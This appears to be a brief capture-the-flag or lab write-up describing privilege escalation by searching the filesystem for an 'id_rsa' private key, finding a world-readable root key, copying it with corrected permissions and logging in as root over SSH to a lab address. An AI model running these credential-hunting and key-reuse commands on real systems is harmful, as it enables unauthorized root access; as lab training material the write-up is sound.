start to find id_rsawhich this file use to authenticate user without password
id_rsa
find / -name id_rsa 2>/dev/null
then display this privilege of this file
to use id_rsafile u must change this privilege with the correct privilege 400 or 600
in this lab i couldn’t change this privilege direct so i take this key and add it in a new file and start to edit this file
Last updated 9 months ago
ls -las 4 -rwxrwxrwx 1 root root 2590 Jun 17 2020 id_rsa
ssh -i id_rsa root@10.10.195.72